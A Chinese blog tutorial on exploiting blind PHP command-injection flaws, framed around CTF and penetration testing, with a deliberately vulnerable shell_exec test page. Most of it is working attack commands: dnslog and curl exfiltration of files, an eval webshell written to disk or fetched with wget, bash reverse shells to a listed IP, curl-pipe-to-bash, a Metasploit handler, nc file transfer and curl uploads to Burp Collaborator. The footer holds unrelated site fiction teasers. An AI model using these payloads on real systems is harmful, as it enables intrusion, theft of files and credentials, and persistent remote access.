浅谈PHP无回显命令执行的利用

前言

在CTF题或在一些渗透测试中往往会遇到没有回显的命令执行漏洞,为了能更好的实现对无回显命令执行漏洞的利用,我对此进行了简单总结。

判断方法

命令执行可能会存在命令执行但没有回显,所以首先要判断命令是否有执行。确定命令可以执行,然后就可以进行无回显命令执行的利用了。

1、审计代码

审计代码,根据代码逻辑判断(这个就需要扎实的审计代码能力的功底了)

2、利用延时

ip=|sleep5

如果执行后延时5秒,就证明测试点存在命令执行漏洞

3、HTTP请求

注意:ping命令不会产生http请求

1.在公网服务器监听监听端口

nc -lp4444

2.向目标服务器发起http请求,执行curl命令

ip=|curl ip:4444

如果向目标服务器发起http请求后,公网服务器监听端口得到一些信息,就证明测试点存在命令执行漏洞。

4、DNS请求

如果请求的目标不是ip地址而是域名,那么域名最终还要转化成ip地址,就肯定要做一次域名解析请求。那么假设我有个可控的二级域名,那么它发出三级域名解析的时候,我这边是能够拿到它的域名解析请求的,这就相当于可以配合DNS请求进行命令执行的判断,这一般就被称为dnslog。(要通过dns请求即可通过ping命令,也能通过curl命令,只要对域名进行访问,让域名服务器进行域名解析就可实现) 来源:安全脉搏

(1)首先去ceye.io注册个账号,注册完后会给一个域名

我注册后给的域名是v4utm7.ceye.io

(2)如果有域名解析请求就会被记录。访问qwzf.v4utm7.ceye.io,那么就会记录下来这个域名解析请求。

简单测试一下向目标服务器发起http请求,执行下面的命令

ip=|curl`whoami`.v4utm7.ceye.io

查看dnslog

若果得到执行结果(如上面执行whoami命令,得到www-data),就说明测试点存在命令执行。

利用方法

了解了无回显命令执行的判断方法后,当然是还需要了解学习一下无回显命令执行的利用方法。

但测试利用方法之前,首先要准备一下环境。于是我写出下面的测试代码进行利用测试:

index.php

<?phpheader("Content-type: text/html; charset=utf-8");highlight_file(__FILE__);include("flag.php");$ip=$_REQUEST['ip'];if($ip){shell_exec("ping -c 4 ".$ip);}?>

1、执行命令

利用条件:需要站点目录具有写权限

通过执行命令,直接将php文件写入到在浏览器可直接读取的文件类型中(如txt文件),然后访问txt文件即可得到php文件内容

1.使用>或>>

cat flag.php > flag.txtcat flag.php >> flag.txt

2.使用cp命令

cp flag.php flag.txt

3.使用mv命令

mv flag.php flag.txt

通过执行tar命令和zip命令打包或压缩php文件,在浏览器上下载打包或压缩文件解压得到php文件内容

(1)tar打包或tar打包并压缩

tar cvf flag.tar flag.phptar zcvf flag.tar.gz flag.php#解打包并解压缩:tar zxvf flag.tar.gz

解打包得到flag:

(2)zip压缩

zip flag.zip flag.php#解压缩:unzip flag.zip

等等。

2、写webshell(直接写入或外部下载webshell)

利用条件:需要站点目录具有写权限

1.写webshell

echo3c3f706870206576616c28245f504f53545b3132335d293b203f3e|xxd -r -ps > webshell.phpecho"<?php @eval(\$_POST[123]); ?>"> webshell.php

2.外部下载shell

利用条件:目标服务器可以连接外网或可以与攻击机互通,且能执行wget命令

wget 网址 -O webshell.php#使用wget下载shell,使用参数-O来指定一个文件名

利用命令执行写webshell或外部下载webshell后,用蚁剑连接测试,发现成功

然后在蚁剑里直接查看flag.php文件,即可得到flag。

3、在vps上建立记录脚本

利用条件:需要目标服务器可以向公网服务器发起http请求,并且能执行curl命令或wget命令

1.构造记录脚本

在自己的公网服务器站点根目录写入php文件,内容如下:

record.php


2.构造请求

在目标服务器的测试点可以发送下面其中任意一条请求进行测试

curl http://*.*.*.**/record.php?data=`cat flag.php`wget http://*.*.*.*/record.php?data=`cat flag.php`

3.测试

执行命令后发现在公网服务器得到的flag.txt文件中,只得到下面内容,并未得到flag

于是考虑对命令执行的结果进行编码后写入flag.txt文件

curl http://*.*.*.**/record.php?data=`cat flag.php|base64`wget http://*.*.*.*/record.php?data=`cat flag.php|base64`

最终得到

Base64解码即可得到flag。

4、通过dnslog带出数据

(1)命令执行时要避免空格,空格会导致空格后面的命令执行不到;

(2)将读取的文件命令用反引号``包含起来;

(3)拼接的域名有长度限制。

利用命令:

curl`命令`.域名

测试一下命令

#用<替换读取文件中的空格,且对输出结果base64编码curl`cat

利用dnslog,查看文件内容(flag.php文件内容)

base64解码得到flag

5、反弹shell

利用条件:目标服务器可以向可通信的公网服务器发起http请求

1.服务器端执行

nc -vv -lp 8888

2.命令执行处执行

bash -i >& /dev/tcp/47.95.206.199/8888 0>&1

3.payload

ip=127.0.0.1%0d%0abash+-i+>%26+/dev/tcp/47.95.206.199/8888+0>%261

注意:百度搜索到的基本上都是上边这个方法,但经过测试并未成功。于是想到以前见过的一种方法

#1.首先在公网服务器使用nc命令监听端口nc -lvp4444#或nc -vv -lp 4444#2.然后在公网服务器上写一个文件(我写入到qwzf文件),内容是下面命令bash -i >&/dev/tcp/x.x.x.165/44440>&1#3.最终浏览器上执行的payload(实际上就是在目标机执行curl x.x.x.165:8002/qwzf|bash)ip=|curl x.x.x.165:8002/qwzf|bash

6、msf反向回连

利用条件:目标服务器可以向可通信的公网服务器发起http请求

1.远程服务器用msf监听:

use exploit/multi/handlersetpayload linux/armle/shell/reverse_tcpsetlport4444setlhost xxx.xxx.xxx.xxxsetexitonsessionfalseexploit -j

2.目标服务器执行下面命令

ip=|bash -i >&/dev/tcp/xxxxx(vps公网ip)/44440>&1#如果上面这条命令在浏览器上执行失败。那么要将上面这条命令写入公网服务器上的一个文件中,在msf开始监听后,在测试点执行下面命令ip=|curl x.x.x.165:8002/qwzf|bash

3.公网服务器接收shell

目标服务器上执行命令后,会在公网服务器上接收到,然后在公网服务器上执行以下命令getshell

sessions -i1shell

然后cat flag.php得到flag。

7、使用nc

利用条件:要求目标服务器也有nc工具

#1.公网服务器监听4444端口nc -tlp4444#2.目标服务器执行如下命令ip=|nc -t x.x.x.1654444< flag.php-u参数调整为udp,当tcp不能使用的时候使用#1.公网服务器监听4444端口nc -ulp4444#2.目标服务器执行如下命令ip=|nc -u x.x.x.1654444< flag.php

8、curl上传文件读取源码

利用条件:目标服务器curl命令可以正常执行

使用curl -F将flag文件上传到Burp的Collaborator Client(Collaborator Client 类似DNSLOG,其功能要比DNSLOG强大,主要体现在可以查看POST请求包以及打Cookies)

1.获取Collaborator Client分配给Burp的链接

打开Burp主界面 -> 菜单(Burp)-> Collaboraor Client -> 点击Copy to Clipboard

Copy得到

jyla6p5cfepdojez34stnodch3ntbi.burpcollaborator.net

2.拼接payload并在命令执行处提交

ip=|curl -X POST -Fxx=@flag.php http://jyla6p5cfepdojez34stnodch3ntbi.burpcollaborator.net

3.查看Collaborator Client收到的数据

成功得到flag。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,240评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,328评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,182评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,121评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,135评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,093评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,013评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,854评论 0 273
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,295评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,513评论 2 332
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,678评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,398评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,989评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,636评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,801评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,657评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,558评论 2 352

推荐阅读更多精彩内容

  • 命令执行的坑其实早就想填了。最早是因为校赛时,easyphp一题自己因为不熟悉命令执行的一些特性导致套娃题绕到最后...
    byc_404阅读 4,649评论 0 4
  • 在一个大佬博客看到的文章。。。然而我忘记是在哪看到的了。。。 php伪协议实现命令执行的七种姿势 文件包含函数:i...
    失眠是真滴难受阅读 553评论 2 1
  • 前言: 还是那一次实习电话面,问到了这样一个问题:面试官:在已经确定了命令执行漏洞的情况下,如果没有回显,如何进行...
    book4yi阅读 3,589评论 5 3
  • 久违的晴天,家长会。 家长大会开好到教室时,离放学已经没多少时间了。班主任说已经安排了三个家长分享经验。 放学铃声...
    飘雪儿5阅读 7,520评论 16 22
  • 今天感恩节哎,感谢一直在我身边的亲朋好友。感恩相遇!感恩不离不弃。 中午开了第一次的党会,身份的转变要...
    迷月闪星情阅读 10,562评论 0 11